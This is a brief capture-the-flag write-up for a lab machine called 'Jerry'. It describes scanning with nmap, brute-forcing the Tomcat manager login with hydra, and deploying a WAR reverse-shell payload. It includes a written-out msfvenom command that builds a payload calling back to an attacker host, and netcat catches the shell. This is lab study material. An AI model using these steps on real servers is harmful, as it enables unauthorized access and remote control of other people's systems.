Jerry
Writeup
Using nmap
to scan and get what port is open and web server.
After accessing to /manager/html
, using hydra
to brute force password
Using msfvenom
to create payload: msfvenom -p windows/reverse_shell_tcp -LHOST {ip} -LPORT [port] -f war > payload.war
. Unpack file so we can see .jsp
file.
Upload war
file, access http://{ip}:{port}/manager/html/{war}/{jsp}
, use netcat
to listen and get reverse shell.